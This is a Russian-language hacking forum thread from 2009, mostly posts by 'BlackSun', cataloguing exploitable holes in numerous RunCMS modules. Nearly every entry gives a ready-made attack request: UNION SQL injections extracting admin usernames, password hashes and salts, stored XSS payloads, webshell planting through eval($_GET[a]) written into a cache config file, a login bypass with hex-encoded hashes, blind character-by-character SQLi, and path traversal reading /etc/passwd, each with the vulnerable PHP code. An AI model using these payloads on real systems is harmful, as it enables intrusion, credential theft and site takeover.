Запрос: /modules/xtremuserguestbook/index1.php?gbid=2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+run cms_users
Параметр gbid - айди текушего юзера
Уязвимый кусок кода:
Не знаю, что это за стеб, видимо тут должна была быть проверка на административные права, но получилось вот так ..
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
switch($op) {
case "Messageedit":
Messageedit($HTTP_GET_VARS["idmsg"]);
break;
function Messageedit($idmsg) {
global $db, $xoopsModule, $myts, $gbid;
$result=$db->query("SELECT user_id,uname,url,email,title,message,note FROM ".$db->prefix("xtremuserguestbook")." WHERE xtremuserguestbook_id=$idmsg");
Так же можно удалять \ редактировать \ etc сообщения
Активная XSS
Уязвимо поле E-mail
mymail@asdasd.ru'><script>alert()</script><'
Заливка шелла через конфиг
Зависимость: на папку /modules/xtremuserguestbook/cache должны стоять 777 чмоды (я к примеру забыл их поставить))
Уязвимый скрипт: /modules/xtremuserguestbook/conf.php
Запрос: /modules/xtremuserguestbook/conf.php?gbid=2&op=Config
Заюзаем поле _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);//
и сохраняем настройки, они сохранятся в cache/2.php
где 2 - наш айди
Уязвимый кусок кода:
Так же, как и в случае со скулей, идет не понятная проверка
$gbid = intval($HTTP_GET_VARS['gbid']);
if ($gbid != $xoopsUser->uid()) {
redirect_header(XOOPS_URL."/",3,_NOPERM);
}
function SaveConfig($unbmessage,$uallowbbcode,$uallowhtml,$ uallowsmileys,$usendmail2webmaster,$umoderate,$ush owdisclaimer,$ushowlogo) {
global $db, $myts, $HTTP_POST_VARS, $gbid;
$fp=fopen("cache/".$gbid.".php","w");
fwrite($fp,'<?php
$uallowbbcode='.$uallowbbcode.';
$uallowhtml='.$uallowhtml.';
$uallowsmileys='.$uallowsmileys.';
$unbmsgbypage='.$unbmessage.';
$usendmail2webmaster='.$usendmail2webmaster.';
$umoderate='.$umoderate.';
$ushowdisclaimer='.$ushowdisclaimer.';
$ushowlogo='.$ushowlogo.';
?>');
fclose($fp);
redirect_header("index.php", 1, _UPDATED);
exit();
}
switch($op) {
case "Config":
Config();
break;
case "SaveConfig":
SaveConfig($nbmessage,$HTTP_POST_VARS["allowbbcode"],$HTTP_POST_VARS["allowhtml"],$HTTP_POST_VARS["allowsmileys"],$HTTP_POST_VARS["sendmail2webmaster"],$HTTP_POST_VARS["moderate"],$HTTP_POST_VARS["showdisclaimer"],$HTTP_POST_VARS["showlogo"]);
break;
}
"Конфиг" после запроса будет выглядеть примерно вот так:
<?php
$uallowbbcode=0;
$uallowhtml=0;
$uallowsmileys=0;
$unbmsgbypage=10;eval($_GET[a]);//;
$usendmail2webmaster=0;
$umoderate=0;
$ushowdisclaimer=0;
$ushowlogo=0;
?>
BlackSun
21.02.2009, 05:32
MyAnnonces
Версия: 1.7
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94
SQL-INJ
Уязвимый скрипт: addannonces.php
Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users
Вместо pass поочереди подставляем uname,pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита)
Уязвимый кусок кода:
Уязвимость можно проэксплуатировать только, если есть хоть 1 категория.
switch($op) {
case "addindex":
addindex($cid);
break;
function addindex($cid) {
..............
list($numrows) = $db->fetch_row($db->query("select cid, title from ".$db->prefix("ann_categories").""));
if ($numrows>0) {
..............
$requete = $db->query("select title, affprix from ".$db->prefix("ann_categories")." where cid=".$cid."");
list($title, $affprix) = $db->fetch_row($requete);
SQL-INJ
Уязвимый скрипт: annonces-p-f.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,pass+from+runcms_ users%23
Уязивмый кусок кода:
switch($op) {
case "EnvAnn":
EnvAnn($lid);
break;
...........
function EnvAnn($lid) {
...........
$result = $db->query("SELECT lid, title, type FROM ".$db->prefix("ann_annonces")." where lid='$lid'");
list($lid, $title, $type) = $db->fetch_row($result);
echo "<B><A HREF=\"index.php\">"._CLA_MAIN."</A> » "._CLA_SENDTO." $lid \"<B>$type : $title</B>\"
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail=blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
На указанный email придет письмо вида
Hello ,
thought that this advert might interest you and wanted to send it to you.
admin : dd94709528bb1c83d08f3088d4043f4742891f4f
153a
Price : 6 Ђ 7
Email address : http://localhost/runcms/modules/MyAnnonces/contact.php?lid=1
Telephone : 5
Town : 11
Country : 12
Other adverts are available in teh Classified Adverts section of Mysite
http://{SITE URL}/modules/MyAnnonces/
Уязвимый кусок кода:
switch($op) {
case "MailAnn":
MailAnn($lid, $yname, $ymail, $fname, $fmail);
break;
............
function MailAnn($lid, $yname, $ymail, $fname, $fmail) {
global $xoopsConfig, $xoopsUser, $db, $monnaie, $ynprice, $myts, $meta;
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Можно обойтись и без отсылки на мыло)
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users
Уязвимый кусок кода:
switch($op) {
case "ImprAnn":
ImprAnn($lid);
break;
..............
function ImprAnn($lid) {
global $xoopsConfig, $db, $monnaie, $useroffset, $claday, $ynprice, $myts, $meta;
$currenttheme = getTheme();
$result = $db->query("SELECT lid, title, type, description, tel, price, typeprix, date, email, submitter, town, country, photo FROM ".$db->prefix("ann_annonces")." where lid=$lid");
Флуд именами\паролями\явками своего \ чужого мыла
Уязвимый скрипт: contact.php
Зависимость: magic_quotes = off
Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+'blacksun@xakep.ru',2,pass,uname,p wdsalt+from+runcms_users%23
Уязвимый кусок кода:
if ($submit) {
include("header.php");
global $xoopsConfig, $db, $myts, $meta;
$result = $db->query("SELECT email, submitter, title, type, description FROM ".$db->prefix("ann_annonces")." WHERE lid = '$id'");
while(list($email, $submitter, $titre, $type, $description) = $db->fetch_row($result)) {
И на этом мне надоело, скриптов в этом модуле еще достаточно и все дырявые .. кто хочет - может добить.
BlackSun
21.02.2009, 06:25
BamaGalerie
Версия: 3.0.1
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=282
Раскрытие путей
/modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page
/modules/bamagalerie3/navig_cat_show.php
/modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page
^ а так же половина скриптов с той же папки (include)
SQL-INJ
Уязвимый скрипт: rateimg.php
Запрос: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
if($HTTP_POST_VARS['submit']) {
.........
} else {
$result=$db->query("select titre from ".$db->prefix("bamagalerie3_img")." where id=$id");
------------------------------------------
MiniGal
Версия: 0.51
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=491
Активная XSS
Добавить коментарий > уязвимо поле name: <script>alert()</script>
Заливка шелла с админки модуля -
Заливаем картинку, затем редактируем Description: <?eval($_GET[a]);?>
Шелл будет в файле mg2db_idatabase.php
BlackSun
21.02.2009, 12:27
RushteR> BlackSun: ты в runcms в модуле myalbum не копался ?
MyAlbum
Версия: 1.0
Скачать: http://www.runcms.ru/modules/files/visit.php?lid=302
SQL-INJ
Уязвимый скрипт: newcomment.php
Запрос: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:
Фактически целиком весь файл
$q = "select l.title from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$item_id and l.lid=t.lid and status>0";
$result=$db->query($q);
list($ltitle)=$db->fetch_row($result);
$subject = $ltitle;
Уязвимый скрипт: photo.php
(Скулю не добил, у меня какие то проблемы с модулем ..)
Запрос: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23
Уязвимый кусок кода:
$q = "select l.lid, l.cid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where l.lid=$lid and l.lid=t.lid and status>0";
$result=$db->query($q);
list($lid, $cid, $ltitle, $ext, $res_x, $res_y, $status, $time, $hits, $rating, $votes, $comments, $description)=$db->fetch_row($result);
Уязвимый скрипт: ratephoto.php
Запрос: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
if($HTTP_POST_VARS['submit']) {
...............
} else {
..............
$result=$db->query("select title from ".$db->prefix("myalbum_photos")." where lid=$lid");
list($title) = $db->fetch_row($result);
Еще одна не добитая скуля, видимо из за корявой установки модуля ..
Уязвимый скрипт: viewcat.php
Запрос: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23
Уязвимый кусок кода:
$fullcountresult=$db->query("select count(*) from ".$db->prefix("myalbum_photos")." where cid=$cid and status>0");
list($numrows) = $db->fetch_row($fullcountresult);
if($numrows>0){
$q = "select l.lid, l.title, l.ext, l.res_x, l.res_y, l.status, l.date, l.hits, l.rating, l.votes, l.comments, t.description from ".$db->prefix("myalbum_photos")." l, ".$db->prefix("myalbum_text")." t where cid=$cid and l.lid=t.lid and status>0 order by $orderby";
$result=$db->query($q,$show,$min);
BlackSun
23.02.2009, 11:22
eBlog
Версия: 0.3
Заходим, создаем свой блог, добавляем запись ..
Уязвимый скрипт: blogentry.php
Запрос: blogentry.php?op=edit&text_id=-1+union+select+1,pass,pwdsalt,4+from+runcms_users+ limit+0,1
Где выделенная еденица - айди вашего блога
Уязвимый кусок кода:
if ($op == 'edit')
{
list($b_id, $title, $txt, $dt) = $db->fetch_row($db->query("select text_blogid, text_title, text_text, text_date from ".
$db->prefix("eblog_text")." where text_id=$text_id"));
if (!isSet($b_id) || $b_id != $blog_id)
{
echo $blog_id;
return;
}
if (!isSet($cats))
{
$result = $db->query("select tc_catid from ".$db->prefix("eblog_text_cat")." where tc_textid=$text_id");
$cats = array();
while ($myrow = $db->fetch_array($result)) { $cats += array($myrow['tc_catid']); }
}
eBlogMenu(array("index.php?blog_id=1" => _EBLOG_MY_BLOG,
"blogentry.php?op=add" => _EBLOG_ADD_ENTRY,
"blogadmin.php?op=edit" => _EBLOG_ADMIN,
"index.php?blog_id=-1" => _EBLOG_CHOOSE_BLOG,
"index.php" => _EBLOG_ALL_LATEST
)
);
showForm(_EBLOG_EDIT_ENTRY, $title, $txt, $all_cats, $cats, $text_id, "");
return;
}
Активная XSS
Уязвимо поле имя блога
BlackSun
23.02.2009, 12:11
Event Calendar
Версия: 2.4
Уязвимый скрипт: display.php
Запрос: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users
Уязвимый кусок кода:
if ($katid) {
$abfrage =" stamp >= \"$year1-$month1-$day1 00:00:00\" AND cid=$katid AND valid ='yes'";
$kat1 = $db->query("SELECT title, cid FROM ".$db->prefix("ecal_cat")." where cid=$katid");
list($kattitle) = $db->fetch_row($kat1);
Уязвимый скрипт: localleve.php
Запрос: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23
Уязвимый кусок кода:
$kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid");
list($loctitle) = $db->fetch_row($kat1);
Уязвимый скрипт: location.php
Запрос: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,1 1+from+runcms_users
Уязвимый кусок кода:
$lid = $HTTP_GET_VARS['lid'];
$locat = $db->query("SELECT * FROM ".$db->prefix("ecal_location")." where lid=".$lid);
$location = $db->fetch_array($locat);
Уязвимый скрипт: modifevent.php
Зависимость: magic_quotes = off
Запрос: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10, 11,12,13,14+from+runcms_users%23
Уязвимый кусок кода:
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = '$id' AND valid='yes'");
$row = $db->fetch_array($query);
Уязвимый скрипт: remind.php
Запрос: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
Уязвимый скрипт: teilnehmen.php
Запрос: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users
Уязвимый кусок кода:
$tid = $HTTP_GET_VARS['id'];
.......
$query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE id = $tid");
$row = $db->fetch_array($query);
BlackSun
23.02.2009, 13:04
Friendfinder
Версия: 3.02
Уязвимый скрипт: search.php
Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&agetill=19+union+select+1,uname,pwdsalt,4,0x31322e 31322e31393939,pass+from+runcms_users%23&sex=&partner=&state=&category=&sort=
Уязвимый кусок кода:
if ($page == search) {
if ($search == search) {
/************************/
$g="SUBSTRING(birth,7)";
$m="SUBSTRING(birth,4,2)";
$d="LEFT(birth,2)";
$dat="CONCAT($g,'.',$m,'.',$d)";
/************************/
$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")."
on state = cid
WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";
} else {
echo ""._TEXTSEARCHUNSUCCESSFUL."";
}
echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";
$result = $db->query($sql);
while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))
{
Уязвимый скрипт: view.php
Зависимость: magic_quotes = off
Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23
Уязвимый кусок кода:
if (isset($id) || $id != "")
{
$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state, country,hobby,partner,height,weight,birth,pic,Desc ription,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");
while (list($id,$user,$active,$sex,$category,$name,$emai l,$city,$state,$country,$hobby,$partner,$height,$w eight,$birth,$pic,$Description,$imgname,$imgtime,$ date,$title ) = $db->fetch_row($view)) {
BlackSun
24.02.2009, 10:26
googlestats
Версия: 2
Уязвимый скрипт: info-robot.php
Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users
Уязвимый кусок кода:
$descr = "descr_".$LANGUE;
$sql = "SELECT *";
$sql .= " FROM ".$TABLE_ROBOTS;
$sql .= " WHERE id=".$robot;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if ($enr = mysql_fetch_array($res))
Уязвимый скрипт: index.php
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20090202
Уязвимый кусок кода:
// index.php
if ( (getVar('rub') == 'bilan') || ($rub == '') )
{
bilan();
}
// ---------------------------------------------------------------------------
// rubrique PAGES
// ---------------------------------------------------------------------------
else if (getVar('rub') == 'pages')
{
pages();
}
............
// lib.php
// contenu
afficherPages($robot);
...........
// function afficherPages()
$sql = "SELECT url, max(date) AS 'lastdate', count(id) AS 'occurrence', ip, dns";
$sql .= " FROM ".$db->prefix("gs_log");
$sql .= " WHERE ".$sql_date;
$sql .= " AND robot=".$robot;
$sql .= " GROUP BY url";
$sql .= " ORDER BY ".$tri;
$res = mysql_query($sql) or erreurServeurMySQL($sql);
if (mysql_num_rows($res) == 0)
BlackSun
25.02.2009, 06:17
HotNews
Версия: 2
Уязвимый скрипт: rate.php
Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users
Уязвимый кусок кода:
if($HTTP_POST_VARS['submit']) {
........
} else {
include(XOOPS_ROOT_PATH."/header.php");
OpenTable();
$result=$db->query("SELECT cid, tname FROM ".$db->prefix("HotNews")." WHERE tid=$tid");
list($cid, $tname) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users
Уязвимый кусок кода:
switch($op) {
case "viewexttutorial":
viewexttutorial();
break;
...........
function viewexttutorial() {
global $db, $xoopsTheme, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
OpenTable();
$result = $db->query("select tlink from ".$db->prefix("HotNews")." where tid=$tid ");
list($tlink) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users
Уязвимый кусок кода:
case "viewtutorial":
viewtutorial();
break;
...........
function viewtutorial() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $HTTP_GET_VARS, $myts, $content_visdefault, $content_default, $content_visualize, $imgwidth, $imgheight, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
$page = $HTTP_GET_VARS['page'];
} else {
$db->query("update ".$db->prefix("HotNews")." set hits=hits+1 where tid=$tid ");
}
OpenTable();
$result = $db->query("select tid, cid, tname, timg, tcont, tauthor, codes, hits, submitter from ".$db->prefix("HotNews")." where tid=$tid ");
list($tid, $cid, $tname, $timg, $tcont, $tauthor, $codes, $hits, $submitter) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users
Уязвимый кусок кода:
case "listHotNews":
listHotNews();
break;
........
function listHotNews() {
global $xoopsConfig, $xoopsUser, $db, $xoopsTheme, $myts, $category_visdefault, $category_visualize, $category_default, $columnset, $imgwidth, $imgheight;
global $tutorial_visdefault, $tutorial_visualize, $tutorial_default, $HTTP_GET_VARS, $framebrowse;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS['cid'];
$xcid = $cid;
OpenTable();
$result = $db->query("select scid, cname, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid, $cname, $cimg) = $db->fetch_row($result);
Уязвимый скрипт: index.php
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users
Уязвимый кусок кода:
case "printpage":
PrintTutPage();
break;
..........
function PrintTutPage() {
global $xoopsConfig, $xoopsUser, $db, $myts, $HTTP_GET_VARS, $imgwidth, $imgheight;
$tid = $HTTP_GET_VARS['tid'];
$result=$db->query("select tname, timg, tcont, codes from ".$db->prefix("HotNews")." where tid=$tid");
list($tname, $timg, $tcont, $codes) = $db->fetch_row($result);
Уязвимый скрипт: submit.php
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users
Уязвимый кусок кода:
case "addTutorial":
addTutorial();
break;
.........
function addTutorial(){
global $db, $xoopsConfig, $xoopsUser, $HTTP_GET_VARS, $myts, $xoopsTheme;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS["cid"];
$createdir = $HTTP_GET_VARS["createdir"];
// Add new Tutorial ------------------//
$result=$db->query("select scid, cname, cdesc, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid,$cname,$cdesc,$cimg) = $db->fetch_row($result);
Заливка шелла
Уязвимый скрипт: upload.php
Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path
( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 )
BlackSun
25.02.2009, 07:03
banners - дефолтный модуль RunCMS
Версия: 1.4
SQL-INJ
Уязвимый скрипт: index.php
Зависимость: magic_quotes = off
Зависимость: Включенный модуль banners
Вначале обойдем авторизацию
Запрос [POST \ GET]: login=q' union select 1,2,3,0x393030313530393833636432346662306436393633 6637643238653137663732#&pass=abc
где 0x393030313530393833636432346662306436393633663764 3238653137663732 - хэш от abc, переведенный в число.
Уязвимый кусок кода:
switch ($_REQUEST['op']) {
case "bannerstats":
bannerstats($_POST['login'], $_POST['pass']);
break;
..........
function bannerstats($login, $pass) {
global $db, $myts, $xoopsConfig, $meta, $xoopsModule;
$sqlpass = md5($pass);
$result = $db->query("SELECT cid, name, login, passwd FROM ".$db->prefix("banner_clients")." WHERE login='$login' AND passwd='$sqlpass'");
list($cid, $name, $login, $passwd) = $db->fetch_row($result);
if ($sqlpass == $passwd) {
Едем дальше, получим пароль админа:
Уязвимый кусок кода:
$result = $db->query("SELECT bid, imptotal, impmade, clicks, datestart FROM ".$db->prefix("banner_items")." WHERE cid=$cid");
// $cid - один из столбцов с предыдущего скуль-запроса
while ( list($bid, $imptotal, $impmade, $clicks, $date) = $db->fetch_row($result) ) {
if ( ($impmade == 0) || ($clicks == 0) ) {
$percent = 0;
} else {
$percent = round(100 * ($clicks/$impmade), 2);
}
if ( $imptotal == 0 ) {
$left = _BN_UNLIMITED;
} else {
$left = ($imptotal-$impmade);
}
echo "
<td class='center'>$bid</td>
Получаем иньекции для второго запроса в мускул:
-1 union select uname,0,0,0,0 from runcms_users limit 0,1
-1 union select pass,0,0,0,0 from runcms_users limit 0,1
-1 union select pwdsalt,0,0,0,0 from runcms_users limit 0,1
Переведем в число:
uname: 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31
pass: 0x2d3120756e696f6e2073656c65637420706173732c302c30 2c302c302066726f6d2072756e636d735f7573657273206c69 6d697420302c31
pwdsalt: 0x2d3120756e696f6e2073656c6563742070776473616c742c 302c302c302c302066726f6d2072756e636d735f7573657273 206c696d697420302c31
Итого общий запрос:
login=q' union select 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31,2,3,0x393030313530393833636432346 6623064363936336637643238653137663732#&pass=abc
BlackSun
25.02.2009, 09:00
messages - дефолтный модуль RunCMS
Версия: 1.02
Blind SQL-INJ
Уязвимый скрипт: read.php и readsend.php
Посимвольный брут
Запрос: /modules/messages/read.php?start=0&total_messages=1&sort=msg_time+and+(select+ascii(substring(pass,1,1 ))+from+runcms_users+limit+0,1)>100&by=DESC
Уязвимый кусок кода:
// read.php
$start = intval($_REQUEST['start']);
$total_messages = intval($_REQUEST['total_messages']);
$sort = $_GET['sort'];
$by = $_GET['by'];
$pm_arr =& PM::getAllPM(array("to_userid=".$xoopsUser->getVar("uid").""), true, $sort, $by, 1, $start);
// pm.class.php
function &getAllPM($criteria=array(), $asobject=false, $sort='msg_time', $order='ASC', $limit=0, $start=0) {
global $db;
$ret = array();
$where_query = '';
if ( is_array($criteria) && count($criteria) > 0 ) {
$where_query = " WHERE";
foreach ( $criteria as $c ) {
$where_query .= " $c AND";
}
$where_query = substr($where_query, 0, -4);
}
if ( !$asobject ) {
$sql = "SELECT msg_id FROM ".$db->prefix("private_msgs")."$where_query ORDER BY $sort $order";
$result = $db->query($sql, $limit, $start);
while ( $myrow = $db->fetch_array($result) ) {
$ret[] = $myrow['msg_id'];
}
} else {
// как видим - нам мешает ORDER BY =\
$sql = "SELECT * FROM ".$db->prefix("private_msgs")."".$where_query." ORDER BY $sort $order";
$result = $db->query($sql, $limit, $start);
while ( $myrow = $db->fetch_array($result) ) {
$ret[] = new PM($myrow);
}
}
return $ret;
}
BlackSun
27.02.2009, 16:22
Members List
Версия: 1.1
Уязвимый скрипт: index.php
Запрос: /modules/memberslist/index.php?query=!')+union+select+1,pass+from+runcm s_users%23
Уязвимый кусок кода:
if ( isset($query) ) {
$where = "WHERE level>0 AND (uname LIKE '%$query%' OR user_icq LIKE '%$query%' ";
$where .= "OR user_from LIKE '%$query%' OR user_sig LIKE '%$query%' ";
$where .= "OR user_aim LIKE '%$query%' OR user_yim LIKE '%$query%' OR user_msnm like '%$query%'";
if ( $xoopsUser ) {
if ( $xoopsUser->isAdmin() ) {
$where .= " OR email LIKE '%$query%'";
}
}
$where .= ") ";
} else {
$where = "WHERE level>0";
}
$result = $db->query("SELECT uid, uname FROM ".$db->prefix("users")." $where ORDER BY uid DESC",1,0);
list($lastuid, $lastuser) = $db->fetch_row($result);
BlackSun
27.02.2009, 18:39
Arcade
Версия: 0.51
Уязвимый скрипт: index.php
Запрос: /modules/arcade/index.php?act=show_cat&cat_id=-1+union+select+1,pwdsalt,pass,4,uname,6,7,8,9,10,1 1,12,13,14,15+from+runcms_users%23
Уязвимый кусок кода:
switch($act)
{
case 'show_cat':
{
show_category($cat_id);
break;
}
...........
// /include/arcade_func.php
function _show_cat_games($cat_id)
{
global $db, $HTTP_GET_VARS, $options;
$sql = "SELECT * FROM ".$db->prefix('arcade_cats')." WHERE cat_id=$cat_id";
$res = $db->query($sql);
$catrow = $db->fetch_object($res);
$sql1 = "SELECT count(*) from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res1 = $db->query($sql1);
list($total_games) = $db->fetch_array($res1);
$pager = new PageNav($total_games, $options['games_per_page'], $HTTP_GET_VARS['start'], "start", "act=show_cat&cat_id=$cat_id");
$sql2 = "SELECT * from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res2 = $db->query($sql2, $options['games_per_page'], $HTTP_GET_VARS['start']);
if ($catrow->cat_info) { $boxstuff = "<center><h1>".$catrow->cat_info."</h1></center><br />";}
if ($pager->renderNav()) { $boxstuff .= "<center>".$pager->renderNav()."</center><br />";}
$title= _MD_DISPCAT.$catrow->cat_name;
while ($row = $db->fetch_object($res2))
{
$boxstuff .=_display_game_info($row);
}
if ($pager->renderNav()) { $boxstuff .= "<br /><center>".$pager->renderNav()."</center>";}
themecenterposts($title, $boxstuff);
}
Запрос: /modules/arcade/index.php?act=play_game&gid=-1+union+select+1,pwdsalt,3,4,uname,6,7,8,9,10,11,1 2,pass,14,15+from+runcms_users%23
Уязвимый кусок кода:
case 'play_game':
{
play_game($gid);
break;
}
.....
// /include/arcade_func.php
function play_game($gid)
{
......
swf_display($gid);
......
function swf_display($gid)
{
global $db;
$sql = "SELECT * from ".$db->prefix('arcade_games')." WHERE gid=".$gid;
$res = $db->query($sql);
Запрос: /modules/arcade/index.php?act=show_stats&gid=-1+union+select+pass,2+from+runcms_users%23
Уязвимый кусок кода:
case 'show_stats':
{
show_gamestats($gid);
break;
}
.......
function show_gamestats($gid)
{
OpenTable();
_display_gamestats($gid);
CloseTable();
}
.......
function _display_gamestats($gid)
{
global $db, $HTTP_POST_VARS, $xoopsUser, $options;;
$sql = "SELECT gtitle,highscore_type FROM ".$db->prefix('arcade_games')." WHERE gid=".$gid."";
$res = $db->query($sql);
Чтение произвольных файлов
Зависимость: magic_quotes = off
Запрос: /modules/arcade/index.php?act=download_game&game=/../../../../../../../../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
case 'download_game':
{
download_game($game);
break;
}
.....
function download_game($game)
{
global $HTTP_POST_VARS, $xoopsUser;
$dir = XOOPS_ROOT_PATH."/modules/arcade/cache/tar/";
$file = $dir."game_".$game.".tar";
$dir2 = XOOPS_ROOT_PATH."/modules/arcade/tar/";
$file2 = $dir2."game_".$game.".tar";
if ( !@file_exists($file) && !@file_exists($file2) )
{
new_tar($game);
} else {
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-type: application/x-tar');
$header="Content-Disposition: attachment; filename=game_".$game.".tar";
header($header );
header("Content-Transfer-Encoding: binary");
@readfile($file);
}
}
На этом закончу с этим модулем, дальше все те же скули ..
BlackSun
27.02.2009, 19:05
Book Reviews
Версия: 0.3
Уязвимый скрипт: index.php
Запрос:
/modules/mareviews/?func=catlist&category=%252d%2531%2527%2520%2575%256e%2569%256f% 256e%2520%2573%2565%256c%2565%2563%2574%2520%2563% 256f%256e%2563%2561%2574%255f%2577%2573%2528%2530% 2578%2533%2561%252c%2570%2561%2573%2573%252c%2570% 2577%2564%2573%2561%256c%2574%2529%252c%2575%256e% 2561%256d%2565%252c%2533%2520%2566%2572%256f%256d% 2520%2572%2575%256e%2563%256d%2573%255f%2575%2573% 2565%2572%2573%2523
Уязвимый кусок кода:
function show_catlist($category) {
global $isbn, $title, $db;
// а благодаря этому можно заюзать concat для гламурности,
// а так-же забыть про magic_quotes ..
// .. дважды заURLэнкодив иньекцию
